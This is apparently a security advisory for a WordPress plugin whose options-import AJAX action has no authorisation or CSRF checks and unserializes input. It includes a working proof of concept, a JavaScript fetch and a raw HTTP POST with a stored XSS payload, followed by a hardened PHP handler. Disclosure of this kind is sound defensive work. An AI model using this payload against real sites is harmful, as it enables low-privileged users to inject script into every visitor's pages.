The plugin does not perform any authorisation or CSRF checks in the insight_customizer_options_import AJAX action (available to any authenticated user), does not validate user input before passing it to unserialize(), and does not sanitise or escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks.
let formData = new FormData;
formData.append('import-file', new Blob(['a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}']));
formData.append('action', 'insight_customizer_options_import');
fetch("https://example.com/wp-admin/admin-ajax.php", { "body": formData, "method": "POST" })
  .then(response => response.text())
  .then(data => console.log(data));

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------189498983625966260651015514771
Content-Length: 458
Connection: close
Cookie: [any authenticated user]

-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="import-file"; filename="blob"
Content-Type: application/octet-stream

a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}
-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="action"

insight_customizer_options_import
-----------------------------189498983625966260651015514771--

The XSS will be triggered in all frontend pages.
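For contrast, the defensive counterpart, added here as an illustration and not taken from the plugin: an admin-ajax import handler that closes each gap named in the description (capability check, nonce, no unserialize() on the upload, allow-listed and validated values, escaped output). The function, option and nonce names are assumptions chosen for the example.

```php
<?php
// Added example (not the plugin's code): a hardened admin-ajax import handler.
// Function, option and nonce names are assumptions chosen for illustration.
add_action( 'wp_ajax_insight_customizer_options_import', 'example_customizer_options_import' );

function example_customizer_options_import() {
    // Authorisation: only users allowed to change theme settings, not any logged-in Subscriber.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'Insufficient permissions.', 403 );
    }
    // CSRF: require a nonce for this action, sent by the legitimate import form as "_wpnonce".
    check_ajax_referer( 'example_customizer_import', '_wpnonce' );
    if ( empty( $_FILES['import-file']['tmp_name'] ) || ! is_uploaded_file( $_FILES['import-file']['tmp_name'] ) ) {
        wp_send_json_error( 'No import file received.', 400 );
    }
    $raw = file_get_contents( $_FILES['import-file']['tmp_name'] );

    // Do not unserialize() untrusted input: a JSON document cannot instantiate PHP objects.
    // If a legacy serialized format must be read, at least call
    // unserialize( $raw, array( 'allowed_classes' => false ) ) to block object injection.
    $data = json_decode( $raw, true );
    if ( ! is_array( $data ) ) {
        wp_send_json_error( 'Import file must be a JSON object.', 400 );
    }

    // Allow-list the keys and validate each value for its type before storing it.
    $clean = array();
    if ( isset( $data['background_color'] ) && is_string( $data['background_color'] )
         && preg_match( '/^#[0-9a-fA-F]{6}$/', $data['background_color'] ) ) {
        $clean['background_color'] = strtolower( $data['background_color'] );
    }
    if ( isset( $data['site_title'] ) && is_string( $data['site_title'] ) ) {
        $clean['site_title'] = sanitize_text_field( $data['site_title'] );
    }
    update_option( 'example_customizer_options', $clean );

    // Escape anything echoed back in the AJAX response.
    wp_send_json_success( array_map( 'esc_html', $clean ) );
}

// Frontend output: the stored colour lands inside a <style> block, where HTML escaping alone
// is not enough, so only a value already validated as a hex colour is ever emitted.
function example_customizer_print_styles() {
    $opts  = get_option( 'example_customizer_options', array() );
    $color = isset( $opts['background_color'] ) ? $opts['background_color'] : '';
    if ( preg_match( '/^#[0-9a-f]{6}$/', $color ) ) {
        echo '<style>body { background-color: ' . $color . '; }</style>';
    }
}
add_action( 'wp_head', 'example_customizer_print_styles' );
```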
Krzysztof Zając
Krzysztof Zając
Yes
2021-12-28
2022-02-15
2022-04-08